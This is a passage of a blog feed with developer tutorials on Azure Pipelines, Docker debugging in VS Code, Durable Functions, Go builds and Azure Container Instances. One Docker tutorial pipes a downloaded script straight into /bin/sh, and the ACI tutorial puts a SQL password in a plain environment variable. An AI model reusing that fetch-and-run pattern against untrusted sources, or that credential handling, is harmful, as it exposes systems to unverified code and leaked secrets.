job out into a separate file that you can reference.\nFantastic, it works just as I want it to; the only thing left is to pass in the various parameters.
That’s easy to do from the main Pipeline:\n1 2 3 4 5 jobs: - template: templates/npm-with-params.yml # Template reference parameters: name: Linux vmImage: 'ubuntu-16.04' And then I hit a problem…\nWorking with output variables Not all the variables I need to pass in are static values, some are the result of other tasks (in this case ARM deployments), which means that I am setting some multi-job output variables.\nPrior to the refactor I was accessing the output variable with $[dependencies.JobName.outputs['taskName.VariableName']] and it was all good, now I need to pass it in, so we’ll update our template call:\n1 2 3 4 5 6 7 jobs: # omitted parent jobs - template: templates/some-template.yml # Template reference parameters: STORAGE_ACCOUNT_NAME: $[dependencies.JobName.outputs['taskName.StorageAccountName']] name: SomeName azureSubscription: '...' Then in the template I would use it like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 parameters: STORAGE_ACCOUNT_NAME: '' name: '' jobs: - job: ${{ parameters.name }} pool: vmImage: 'Ubuntu-16.04' steps: - task: AzureCLI@1 inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: ${{ parameters.STORAGE_ACCOUNT_NAME }} inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') # more script here I run this and get an error:\naz storage account keys list: error: Storage account ‘$[dependencies.JobName.outputs[’taskName.StorageAccountName’]]’ not found.\nUmm… what? Yes, you’re right Azure, that isn’t the name of the storage account, it’s the dynamic variable you should’ve evaluated! Why didn’t you evaluate?!\nEvaluation of parameters in templates So here’s the problem, the parameter I’m passing to my template isn’t being evaluated, which means that it’s being passed in a raw manner to the script when I want to use it. But never fear there’s an easy fix, you just need to assign the parameter to a variable:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 parameters: STORAGE_ACCOUNT_NAME: '' name: '' jobs: - job: ${{ parameters.name }} pool: vmImage: 'Ubuntu-16.04' variables: STORAGE_ACCOUNT_NAME: ${{ parameters.STORAGE_ACCOUNT_NAME }} steps: - task: AzureCLI@1 inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: $(STORAGE_ACCOUNT_NAME) inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') # more script here Now you refer to the variable not the parameter in your tasks.\nConclusion Honestly, I racked my brain on this for the better part of a day, and it really isn’t obvious that this is the case. 
I only stumbled on it by accident after trying a lot of other things.\nHopefully this helps someone else out when they are trying to work out why their template parameters aren’t evaluated!\n", "id": "2019-05-24-azure-pipeline-templates-and-parameters" }, { "title": "Fixing Issue When You Can't Connect to Docker Debugger in VS Code", "url": "https://www.aaron-powell.com/posts/2019-05-17-fixing-cant-connect-to-docker-debugger/", "date": "Fri, 17 May 2019 15:35:46 +1000", "tags": [ "docker", ".net", "vscode", "debugging" ], "description": "Some Docker containers can't connect because they can't find the process, here's a fix", "content": "I’ve previously blogged about debugging .NET Docker containers in VS Code but recently I came across a problem with a container that I had a .NET Core application in failing to connect the debugger with the following error:\nExecuting: docker.exe exec -i sunshine-functions sh -s < /home/aaron/.vscode-remote/extensions/ms-vscode.csharp-1.19.1/scripts/remoteProcessPickerScript Linux stderr: sh: 1: ps: not found Error Message: Command failed: docker.exe exec -i sunshine-functions sh -s < /home/aaron/.vscode-remote/extensions/ms-vscode.csharp-1.19.1/scripts/remoteProcessPickerScript sh: 1: ps: not found THe crux of the problem is that it’s unable to list the processes that I need to pick from in VS Code.\nThe image I was using as my base image was the Azure Functions Host, specifically mcr.microsoft.com/azure-functions/dotnet and it turns out that this particular image doesn’t have ps anywhere in it!\nThankfully, this is an easy fix, you need to install procps using apt install, assuming your image is from a distro that supports apt of course. 😉\nOnce ps is installed into your image you’ll now be able to list the processes and then debug your image.\n", "id": "2019-05-17-fixing-cant-connect-to-docker-debugger" }, { "title": "Creating Event-Based Workflows With Azure Durable Functions", "url": "https://www.aaron-powell.com/posts/2019-05-08-event-based-workflows-with-durable-functions/", "date": "Wed, 08 May 2019 10:37:32 +1000", "tags": [ "azure-functions", "fsharp", "csharp", "javascript" ], "description": "How to orchestrate event-based workflows using Azure Durable Functions", "content": "Durable Functions is an extension of the Azure Functions serverless stack that introduces state management and orchestration across functions without the need to write the plumbing code yourself.\nToday, I want to take a look at the scenario of creating a client-driven event workflow system. Our client will initiate a request and that will start a workflow. We’ll use the HTTP binding for our function and also pass in the OrchestrationClient:\n1 2 3 4 5 6 7 8 9 10 11 [<FunctionName("StartWorkflow")>] let startWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "start/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Starting a new workflow for %s" input) let! _ = starter.StartNewAsync(eventName, input) return OkResult() } The route has a parameter, input, that’s passed in and we’ll use that as our identifier across API calls (you could use the instanceId returned from starting the workflow instead if you want) otherwise there’s nothing overly complex here, we use the DurableOrchestrationClient to start the workflow using StartNewAsync(<name of instance>, <data for instance>).\nNow we’ll need to create our workflow function. 
This will use the OrchestrationTrigger:\nmodule Workflow open Microsoft.Azure.WebJobs open Microsoft.Extensions.Logging open FSharp.Control.Tasks.V2.ContextInsensitive let eventName = "Workflow" [<FunctionName("Workflow")>] let run ([<OrchestrationTrigger>] context : DurableOrchestrationContext) (logger : ILogger) = task { let input = context.GetInput<string>() sprintf "Starting workflow for %s" input |> logger.LogInformation do! context.WaitForExternalEvent(eventName) sprintf "Workflow for %s is stopping" input |> logger.LogInformation } The module defines the name of the event, Workflow, that we used in the first function, it then unpacks the data passed in using context.GetInput<string>() and then tells the function to sleep until an event is triggered using context.WaitForExternalEvent(eventName).\nNow, this WaitForExternalEvent is an important function, what it’s doing is telling our function that something outside of its control will be controlling its execution and that it should go to sleep until that event is triggered, and that event must be triggered on the specific instance as well. This function is now “sleeping” and not consuming resources (or money) and can sleep for as long as you need it to. It also returns a Task, meaning it’s async, so you could combine it with a timer and have it only sleep for a period of time if you wanted.\nThe next function that we’re going to create is an HTTP endpoint to check the status of the workflow. This function would be one that you call from the client in a polling manner to perform an action once the workflow has completed.\n[<FunctionName("CheckWorkflow")>] let checkWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "check/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Checking workflow for %s" input) let offset = TimeSpan.FromMinutes 20. let time = DateTime.UtcNow let! instances = starter.GetStatusAsync (time.Subtract offset, Nullable(time.Add offset), System.Collections.Generic.List<OrchestrationRuntimeStatus>(), CancellationToken.None) return OkObjectResult(instances |> Seq.find (fun i -> i.Name = eventName && i.Input.ToObject<string>() = input)) } We’re using the HttpTrigger again and also getting an OrchestrationClient provided, but this time we’re using the client to search for all running workflow instances via the GetStatusAsync method (I’m also providing a date range for the search so that it doesn’t find everything in my storage account). Once we have all the instances I’m then looking for any that match the input that is passed in, but if you were using the instanceId you could filter against that. The function then returns an object containing the found instance.
This would allow the client to check against it for whether it’s completed or not and make a decision on what to do in the client.\nOur workflow can be started, we are able to poll it and check its status, now it’s time to implement a way to invoke the event and complete the workflow:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [<FunctionName("StopWorkflow")>] let stopWorkflow ([<HttpTrigger(AuthorizationLevel.Anonymous, "get", Route = "stop/{input}")>] req : HttpRequest) ([<OrchestrationClient>] starter : DurableOrchestrationClient) input (logger : ILogger) = task { logger.LogInformation(sprintf "Stopping workflow for %s" input) let offset = TimeSpan.FromMinutes 20. let time = DateTime.UtcNow let! instances = starter.GetStatusAsync (time.Subtract offset, Nullable(time.Add offset), System.Collections.Generic.List<OrchestrationRuntimeStatus>(), CancellationToken.None) return! match instances |> Seq.tryFind (fun i -> i.Name = eventName && i.Input.ToObject<string>() = input) with | Some instance -> task { logger.LogInformation(sprintf "Found a matching instance with id %s" instance.InstanceId) do! starter.RaiseEventAsync(instance.InstanceId, eventName, input) return OkObjectResult(instance) :> IActionResult } | None -> task { sprintf "Didn't find a matching instance for %s" input |> logger.LogInformation return NotFoundResult() } } We’re performing a similar bit of searching logic here to find our workflow instance and if it’s found we use the DurableOrchestrationClient RaiseEventAsync method and provide it with the ID of the workflow instance and the event name that we are waiting for, plus any input that we want to pass for the event.\nThis event will be raised asynchronously and the Workflow function will resume at the point it was waiting for the event, then run through to completion. The important part here is that it is asynchronous, meaning that if you were to poll immediately afterwards then the status might not be completed, because the Workflow function might not have triggered/run to completion.\nConclusion Here we have an example of using events in Durable Functions to control a background job. Admittedly, we’ve used HTTP endpoints to trigger each step of the way but there is no reason why the “stop” function couldn’t be written to wait for an item being written to Blob storage or any other Function trigger.\nIt’s also worth remembering that this processing is all handled asynchronously, so you could wait for multiple events and use a Task.WhenAny to only wait for one event to be triggered, or combine with a timeout so you only wait for an event for a predefined period of time.\nIf you want to have a try yourself I’ve created a sample on GitHub with implementations in F#, C# and JavaScript.\n", "id": "2019-05-08-event-based-workflows-with-durable-functions" }, { "title": "Removing VS Code Remote Extensions", "url": "https://www.aaron-powell.com/posts/2019-05-08-removing-vscode-remote-extensions/", "date": "Wed, 08 May 2019 10:37:32 +1000", "tags": [ "vscode" ], "description": "Fixing problems with a corrupt vscode remote instance", "content": "If you missed the announcement last week the VS Code team have released some remote development extensions which allow you to run VS Code against a remote environment, whether that’s WSL, SSH or running in a container. 
This is a fantastic extension and I’m totally in love with it, but there’s always the possibility of something going wrong (that’s what happens when you’re living on the edge).\nToday I went to start writing a blog post (not this one!) and in doing so I installed Spell Right, the extension I use for spell checking. As soon as VS Code reloaded things went wrong, it wouldn’t connect to WSL anymore, and it turns out there’s a bug in Spell Right that causes VS Code Remote Extensions to hang.\nThis isn’t really a problem with Spell Right, I am using a preview version of VS Code and a preview extension pack, I’m just surprised I hadn’t hit a problem sooner! 🤣\nAnyway, we have a problem now and I need to remove that extension from the remote host, but here’s the catch, you use VS Code to manage remotely installed extensions and if it can’t connect to the remote host then you can’t manage the extensions!\nDeleting Remote Extensions without VS Code I started reading through the docs to work out how to remove the extension, with no luck. My next step was to try and unpack the extension and hope I could find something in there, but that wasn’t sounding like a fun idea… Thankfully I work with a really knowledgable team and my colleague Bruno Borges came to my rescue.\nIt turns out that extensions are installed on the remote host at ~/.vscode-remote/extensions, so I fired up WSL, went there and removed the offending extension. And if you need to completely remove the extensions you can rm all folders within there.\nThanks Bruno!\nAlso, if you poke around in the ~/.vscode-remote folder you’ll find a bunch of interesting things in there like the user profile for your remote environment and such. I wouldn’t advise editing them, but they can be a good place to look if you want to try and diagnose issues.\nSo with that extension removed I can write this post about how to remove remote extensions, then get back to the post I actually came here to write! 😜\n", "id": "2019-05-08-removing-vscode-remote-extensions" }, { "title": "Using a Specific Go Version on Azure Pipelines", "url": "https://www.aaron-powell.com/posts/2019-04-12-using-a-specific-go-version-on-azure-pipelines/", "date": "Fri, 12 Apr 2019 10:03:30 +1000", "tags": [ "azure-devops", "golang" ], "description": "How to setup an Azure Pipeline agent to use a specific version of Go for a build", "content": "With Azure Pipelines we can build applications with many different languages, one of which is Go.\nIf you’re using a Hosted Agent, which is the recommended way (since you don’t need to manage your own machines), you are at the mercy of what software is installed on the agent. But if you’re building an application to target a specific runtime, say Go 1.12.3 (the latest at the time of writing), you might be out of luck as the agent doesn’t have that installed on it.\nSo let’s take a look at how to setup Go as part of your pipeline.\nSide note: You can also use Docker for your builds, but Docker isn’t for everyone, so I’m focusing on non-containerised agents here. Docker can also be a challenge if you need several runtimes, to say, build a web application with Go + WASM support.\nWe’re going to be modifying the standard Go Azure Pipeline, so start with that a template.\nSetting up our variables The first thing we’ll want to do is modify the variables that Go will be expecting, specifically GOPATH and GOROOT. 
By default, these point to one of the versions of Go on the agent, but we’ll modify them to use our version of Go.\nvariables: GOPATH: '$(Agent.BuildDirectory)/gopath' # Go workspace path GOROOT: '$(Agent.BuildDirectory)/go' # Go installation path GOBIN: '$(GOPATH)/bin' # Go binaries path modulePath: '$(GOPATH)/src/github.com/$(build.repository.name)' # Path to the module's code We’re using one of the Agent’s pre-defined variables, Agent.BuildDirectory, as it’s somewhere I know I can write to on the Agent, and it’s scoped to my build in particular.\nThe GOPATH is going to be a new folder we’ll create and GOROOT will be where Go is unpacked to. These will now be environment variables so when Go eventually executes, it’ll be the right version of Go.\nDownloading Go Next, we’ll add a new step to download and unpack the version of Go we want to target:\nsteps: - script: | wget "https://storage.googleapis.com/golang/go1.12.3.linux-amd64.tar.gz" --output-document "$(Agent.BuildDirectory)/go1.12.3.tar.gz" tar -C '$(Agent.BuildDirectory)' -xzf "$(Agent.BuildDirectory)/go1.12.3.tar.gz" displayName: 'Install Go 1.12' Since we know my agent is a Linux agent (from the pool defined in the template) we’ll use wget to download the Linux binaries and drop them into the Agent.BuildDirectory. With that done we can unpack it with tar, specifying that we want to unpack to Agent.BuildDirectory, and given the structure of the tar.gz contains a folder named go we’ll end up with a path that matches GOROOT nicely.\nLastly, we need to ensure that the PATH of the agent knows about this version of Go, and we do that by setting output variables:\n- script: | echo '##vso[task.prependpath]$(GOBIN)' echo '##vso[task.prependpath]$(GOROOT)/bin' This is covered in the Set up a Go workspace step in the docs guide.\nNow the rest of the pipeline can follow exactly as the template describes!\nConclusion Version pinning of dependencies is really important to ensure that we have repeatable builds over time. Since we don’t want to end up in a situation where we manually manage our agent pool we want our build definition to prepare the agent with the environment we desire, including setting up the appropriate runtimes.\nYou can see a full pipeline definition on my GitHub that utilises this approach.\nYou could also use this approach to prepare multiple different versions of Go to create a build matrix against several runtime releases, but I’ll leave that as an exercise to you, dear reader 😉.\n", "id": "2019-04-12-using-a-specific-go-version-on-azure-pipelines" }, { "title": "Debugging your .NET Core in Docker applications with VS Code", "url": "https://www.aaron-powell.com/posts/2019-04-04-debugging-dotnet-in-docker-with-vscode/", "date": "Thu, 04 Apr 2019 11:54:45 +1100", "tags": [ "docker", ".net", "vscode", "debugging" ], "description": "Using VS Code to debug a .NET Core application running within a Docker container", "content": "One of the nicest things about building applications on .NET Core is that its cross-platform support means that we can deploy our application as a Docker container. If you’re using Visual Studio it has built in support for Docker but that’s not going to work if you’re on Mac or Linux, or if, like me, you prefer to use VS Code as your editor.\nSo if you create your Dockerfile for .NET it looks something like this:\nFROM mcr.microsoft.com/dotnet/core/sdk:2.2 WORKDIR /app COPY ./bin/Debug/netcoreapp2.2/publish . ENTRYPOINT ["dotnet", "MyApplication.dll"] Great!
We can run our application now by building that image and starting the container, but what happens if we want to debug it?\nEnabling remote debugging If you think about it logically, when running an application in Docker it’s essentially being run remotely. Sure, it might be remotely on the same machine, but it’s still “remote”, and this is how we need to think about debugging!\nTo do this we’ll need to install MIEngine into our Docker image as it’s being built, and to do that we’ll add a new layer into our Dockerfile:\n1 2 3 4 5 6 7 FROM mcr.microsoft.com/dotnet/core/sdk:2.2 RUN apt update && \\ apt install unzip && \\ curl -sSL https://aka.ms/getvsdbgsh | /bin/sh /dev/stdin -v latest -l /vsdbg WORKDIR /app COPY ./bin/Debug/netcoreapp2.2/publish . ENTRYPOINT ["dotnet", "MyApplication.dll"] The new RUN layer will first update apt to get all the latest package references, then install unzip and finally execute curl which pipes to /bin/sh. It might seem a bit confusing, but that’s because we’re chaining three commands together into a single layer to reduce the size of our Docker image. Really the most important part is this line:\n1 curl -sSL https://aka.ms/getvsdbgsh | /bin/sh /dev/stdin -v latest -l /vsdbg This downloads a sh script from https://aka.ms/getvsdbgsh and pipes it straight to /bin/sh for execution and provides a few arguments, most importantly the /vsdbg which is where the remote debugger will be extracted to.\nNow our image has the debugger installed into it we need to setup VS Code to attach to it.\nAttaching VS Code to a remote debugger We’re going to add a new entry to our launch.json file that is of "type": "coreclr" and "request": "attach". This will cause VS Code to launch the process picker and allow us to pick our .NET Core process.\nBut wait, that’s running in a Docker container, how do I pick that process?\nWell, thankfully the process picker dialogue is capable of executing a command to get the list of processes and can do it against a remote machine.\nUnder the hood it will execute docker exec -i <container name> /vsdbg/vsdbg to list the processes within the container, but we’ll do it a little bit nicer:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "name": ".NET Core Docker Attach", "type": "coreclr", "request": "attach", "processId": "${command:pickRemoteProcess}", "pipeTransport": { "pipeProgram": "docker", "pipeArgs": [ "exec", "-i", "sunshine-downloader" ], "debuggerPath": "/vsdbg/vsdbg", "pipeCwd": "${workspaceRoot}", "quoteArgs": false } } Now if you run your container and then launch the debugger in VS Code you’ll be able to pick the dotnet process within the container that your application is using.\nConclusion And there you have it, you can now use VS Code as your editor of choice and also debug applications running in Docker containers. There are more advanced scenarios you can tackle with this including debugging via SSH, all of which are covered on OmniSharp’s wiki.\nIn fact, I’m using this to debug an F# application I’m building to run on .NET Core. 😉\nHappy debugging! 
😁\nBonus Idea: Removing the additional layer with volumes When I shared this post internally my colleague Shayne Boyer brought up an idea on how to tackle this without adding a new layer to your Dockerfile, and in fact, making it possible to debug pre-built images (assuming they have the debugging symbols in them).\nYou can do this by downloading the vsdbg package for the distro your image is based off (Ubuntu, Alpine, ARM, etc.), which you can determine by reading the shell script (or download into a container 😉) onto your machine and then mounting the path as a volume when starting your container:\n1 docker run --rm -v c:/path/to/vsdbg:/vsdbg --name my-dotnet-app my-dotnet-app Now you’ve inserted the debugger into the container when you start it rather than bundling it into the image.\n", "id": "2019-04-04-debugging-dotnet-in-docker-with-vscode" }, { "title": "Typed Bindings for TypeScript Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-04-03-typed-bindings-for-azure-functions/", "date": "Wed, 03 Apr 2019 09:03:52 +1100", "tags": [ "typescript", "azure-functions", "serverless" ], "description": "", "content": "A few weeks ago Microsoft announced their improvements to TypeScript Azure Functions with some new templates to help you get started.\nAs I’m currently doing a bunch of stuff with Azure Functions I decided to give it a go and share some of my learnings. Today I want to talk about how to improve the typedness of Azure Functions with TypeScript.\nWith TypeScript, and naturally JavaScript, we rely on the function.json file to create our bindings to different services (since we don’t have a static type system like .NET functions can leverage). But this results in a disconnect between what we’re binding and what our editor knows about.\nA standard HTTP Trigger binding will see a file scaffolded like this in TypeScript:\n1 2 3 4 5 6 7 import { AzureFunction, Context, HttpRequest } from "@azure/functions" const httpTrigger: AzureFunction = async function (context: Context, req: HttpRequest): Promise<void> { // function code here } export default httpTrigger; Here we’re relying on a bunch of primitive types provided by the Functions TypeScript package, but it doesn’t understand our application at all.\nExtending built-in interfaces To improve on this I’ve started extending the built-in interfaces that are provided in the @azure/functions package to understand the bindings I’m creating, like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { AzureFunction, Context, HttpRequest } from "@azure/functions" interface InputHttpRequest extends HttpRequest { query: { name: string } } const httpTrigger: AzureFunction = async function (context: Context, req: InputHttpRequest): Promise<void> { const name = req.query.name; // function body }; export default httpTrigger; For this example instead of leaving req.query with the type [key: string]: string, meaning it’s a dictionary of anything, I’m saying that I expect the query string provided to have name as one value (and potentially others, but I only care about name). This then gives me good code completion of just how I expect my type to look and when I create tests I know the shape of the object as well.\nTyping bindings Let’s say that you’ve got two additional bindings on your function, a queue output and HTTP response output. 
Again we can extend the built in types to achieve this, this time we’ll extend Context.\nHere’s the bindings from our function.json:\n1 2 3 4 5 6 7 8 9 10 11 12 { "type": "http", "direction": "out", "name": "res" }, { "type": "queue", "direction": "out", "name": "myQueue", "queueName": "my-queue", "connection": "QueueConnectionString" } And the TypeScript:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 interface InputFunctionContext extends Context { bindings: { myQueue: string[] } res: { status?: number body: string } } const httpTrigger: AzureFunction = async function (context: InputFunctionContext, req: InputHttpRequest): Promise<void> { // function code } Both bindings and res have a default type of { [key: string] : any } denoting that they can have as many properties and they are untyped, but we know from our function.json what they should be and we can set them accordingly.\nYou can do the same with input bindings such as Table and type them to the class that they are within your application normally.\nConclusion From what starts out as a very loosely typed design with TypeScript Azure Functions you can easily leverage type extending to make your function code more aware of the bindings and the types that they should represent.\nI’ve created a full working example on GitHub if you’d like to play with it yourself.\n", "id": "2019-04-03-typed-bindings-for-azure-functions" }, { "title": "Intro to Azure Container Instances", "url": "https://www.aaron-powell.com/posts/2019-03-20-intro-to-azure-container-instances/", "date": "Wed, 20 Mar 2019 09:00:27 +1100", "tags": [ "azure", "docker" ], "description": "A quick lap around how to use Azure Container Instances", "content": "Azure Container Instances (ACI) is the easiest way to run a container in the cloud. There’s no need to worry about orchestrators and you can get per-second billing, so why not get started!\nTo help you get started I’ve created a GitHub repository called ACI from scratch that will walk through a number of exercises in using the Azure CLI with ACI. You’ll need to setup an Azure account to get started, so grab a free trial if you don’t have one.\nCreating your first ACI resource When using the Azure CLI we’ll use the az container commands, let’s start creating one using the demo image:\naz container create --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo --image microsoft/aci-helloworld --dns-name-label aci-from-scratch-01-demo --ports 80 I’ve made the assumption you already created a Resource Group called aci-from-scratch-01, which the git repository covers. Also remember that the names of the resources we’re creating will need to be globally unique, so what I’m using in the demo you might want to change yourself to avoid collisions.\nThis command, az container create, is used to create the ACI resource in the resource group you specify. We’ve given it the name aci-from-scratch-01-demo, which is what will appear in the portal, and told it that we’ll use an image from the public Docker image repository, microsoft/aci-helloworld (the code for the image is here).\nBecause this image contains a web server we need to make sure that it’s publicly available, to do that we need to give it a DNS name using --dns-name-label and bind the port(s) that the container will require. Since this is a web server we’re binding port 80.\nNow our deployment is underway, we’ll shortly have it up and running and we can connect to our web server. 
To find the address of the server we can use the az container show:\n$> az container show --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo --query "{FQDN:ipAddress.fqdn,ProvisioningState:provisioningState}" --out table FQDN ProvisioningState ------------------------------------------------- ------------------- aci-from-scratch-01-demo.westus.azurecontainer.io Succeeded We’re filtering the output to only show the Fully Qualified Domain Name (FQDN) and Provisioning State (is it deploying, deployed, stopped, etc.) using the --query parameter. If you grab the FQDN and paste it into a browser you’ll see our demo app running!\nFinally, if you want to know what’s going on inside your container you can use az container logs:\naz container logs --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo This is similar to running a docker logs command but also shows some of the info from ACI itself. Here’s my output:\nlistening on port 80 ::ffff:10.240.255.56 - - [19/Mar/2019:04:03:33 +0000] "GET / HTTP/1.1" 200 1663 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" ::ffff:10.240.255.56 - - [19/Mar/2019:04:40:21 +0000] "GET / HTTP/1.1" 200 1663 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" Working with Azure Container Registry Azure Container Registry (ACR) is a private container registry that you can host your images in. ACR works very nicely with ACI by allowing you to link the two together with minimal effort so you can host containers you built yourself.\nWe use the az acr command to work with ACR and the first thing we’ll need to do is create our registry:\n$> az acr create --resource-group aci-from-scratch-02 --name acifromscratch02 --sku Basic --admin-enabled true { "adminUserEnabled": false, "creationDate": "2019-03-19T05:16:02.230750+00:00", "id": "/subscriptions/7e2b0a07-47db-4a2e-bfca-03c0d5b75f15/resourceGroups/aci-from-scratch-02/providers/Microsoft.ContainerRegistry/registries/acifromscratch02", "location": "westus", "loginServer": "acifromscratch02.azurecr.io", "name": "acifromscratch02", "networkRuleSet": null, "provisioningState": "Succeeded", "resourceGroup": "aci-from-scratch-02", "sku": { "name": "Basic", "tier": "Basic" }, "status": null, "storageAccount": null, "tags": {}, "type": "Microsoft.ContainerRegistry/registries" } Be aware that the name you give your registry can only have numbers and letters.\nThis will create us a registry using the cheapest tier, Basic, but you can change the --sku to be Standard or Premium if you need. The different sku’s mainly represent increased storage, with Premium also including geo replication. We also set --admin-enabled true so that we can use a username/password to push to the registry, alternatively, you can create a Service Principal and use that for authentication.\nFrom the JSON response, the most important piece of information is the loginServer, we’ll need that when it comes to pushing images up to the registry.\nAlso, before we push images we’ll need to log Docker into ACR, you can do that either via the Docker CLI or using az acr login --name <registry name>.\nNow it’s time to set the repository on the images, we do that by prefixing the loginServer from above to the image name to give it a fully qualified name. 
Let’s say we’ve previously built an image called aci-from-scratch-02:v1, we’ll add the registry to it like so:\n$> docker tag aci-from-scratch-02:v1 acifromscratch02.azurecr.io/aci-from-scratch-02:v1 $> docker push acifromscratch02.azurecr.io/aci-from-scratch-02:v1 By adding the repository prefix when we do a docker push Docker knows whether to push it to the public repository or to a 3rd party repository, which in our case we want.\nWe can then inspect ACR to see what images are there:\n$> az acr repository list --name acifromscratch02 --output table Result ------------------- aci-from-scratch-02 $> az acr repository show-tags --name acifromscratch02 --repository aci-from-scratch-02 --output table Result -------- v1 The command az acr repository list will show us what’s in the repository and then we can the results of that in the az acr repository show-tags by setting the name to the --repository option to see what tags exist for a particular image.\nIt’s time to create an ACI that uses the registry. Since we’ve enabled the admin account we need to get the password to login:\naz acr credential show --name acifromscratch02 --query "passwords[0].value" Ideally you’d want to assign this to a variable in your shell (bash/PowerShell/etc.) rather than writing it to stdout. That’d avoid it ending up in the shells history and potentially being compromised.\nWe’ve provided a --query "passwords[0].value" because there are two passwords and we only need one (there are two passwords so that there’s a backup should one be compromised and need resetting).\nNow we can provide credentials to ACI:\naz container create --resource-group aci-from-scratch-02 --name aci-from-scratch-02 --image acifromscratch02.azurecr.io/aci-from-scratch-02:v1 --cpu 1 --memory 1 --registry-login-server acifromscratch02.azurecr.io --registry-username acifromscratch02 --registry-password <password> --dns-name-label aci-from-scratch-02 --ports 80 Notice here that we’re providing the image name with the login server so that when ACI executes a docker pull it knows where to pull from. We also provide the --registry-login-server as the loginServer of our ACR, along with the ACR username and password.\nAccessing Azure Services Let’s say you’re building an application to run in ACI that needs to access another Azure Resource, maybe Azure SQL.\nACI allows us to set environment variables. These work just as you’d expect coming from Docker and can be created as either normal environment variables or secure environment variables. The primary difference between the two is that a secure variable won’t appear in the ACI log or if you query the info of the container.\nHere’s how we’d create a SQL connection string for a web application, note that I’m not using a secure environment variable here:\naz container create --resource-group aci-from-scratch-03 --name aci-from-scratch-03 --image acifromscratch03.azurecr.io/aci-from-scratch-03:v1 --registry-login-server acifromscratch03.azurecr.io --registry-username acifromscratch03 --registry-password <password> --dns-name-label aci-from-scratch-03 --ports 80 --environment-variables 'SQLAZURECONNSTR_DefaultConnection'='Server=tcp:aci-from-scratch-03-sql.database.windows.net,1433;Database=aci-from-scratch;User ID=aci;Password=<sql password>;Encrypt=true;Connection Timeout=30;' The environment variables are --environment-variables and you can set multiple by using a space between them. 
If you were to create a secret one then you’d use the --secrets option (but be aware, they will appear in the CLI that executed the command, so you’re better using shell variables to insert them).\nIf you’re planning to use secret variables you’re better off using a file deployment or Resource Manager template and inject the values into the file at runtime.\nConclusion Azure Container Instances is the easiest way to run a container, whether it’s a web server, a data processing job or as part of an event-driven architecture with Azure Functions/triggered from a Logic App/etc..\nCheck out the exercises on my GitHub repository, ACI from scratch, and walk through creating your first container instances.\n", "id": "2019-03-20-intro-to-azure-container-instances" }, { "title": "Pretty JavaScript Console Messages", "url": "https://www.aaron-powell.com/posts/2019-03-14-pretty-javascript-console/", "date": "Thu, 14 Mar 2019 13:44:34 +1100", "tags": [ "javascript", "fun" ], "description": "Add a bit of flare to your console.log messages", "content": "\nIf you’ve ever opened up your browser tools while logged into Facebook you might have noticed the above in it (at least, this is what it looks like at the time of writing).\nDOM warning aside, it looks a bit different to most console.log messages you’re probably generating, doesn’t it? A big bit of red text and some other slightly larger text. That’s a bit weird, isn’t it?\nAs it turns out the console functions have a number of formatting options, so if you want to display numbers to certain decimal places you can use %.#f like so:\n1 console.log('Pi to 5 decimal places: %.5f', Math.PI); But that only works in Firefox.\nIf you want to specify where an object appears in the log message you can use %O:\n1 console.log('We found an object, %O, in the system', { foo: 'bar' }); But that’s all well and good, how do we make big red text!\nFor that we’ll use the %c formatter to apply CSS at a point in the string:\n1 console.log('%cR%ca%ci%cn%cb%co%cw', 'font-size: 20px; color: blue;', 'font-size: 25px; color: lightblue;', 'font-size: 30px; color: lightgreen;', 'font-size: 35px; color: green', 'font-size: 30px; color: yellow;', 'font-size: 25px; color: orange', 'font-size: 20px; color: red') With %c you provide a string of CSS rules that will be applied until the end of the message being logged or another %c is found. This means you can create lovely rainbow effects like above, manipulating each element along the way. Or if you want to get really adventurous you can do something like this:\n1 console.log('%c' + 'This console is on fire', 'font-family:Comic Sans MS; font-size:50px; font-weight:bold; background: linear-gradient(#f00, yellow); border-radius: 5px; padding: 20px') Yep, we’re setting a gradient background for the text and adding some padding plus rounded corners!\nNow you can’t use all aspects of CSS (I haven’t been able to figure out if you can do animations for example) and it’s not overly useful. But hey, it’s a bit of fun, isn’t it! 
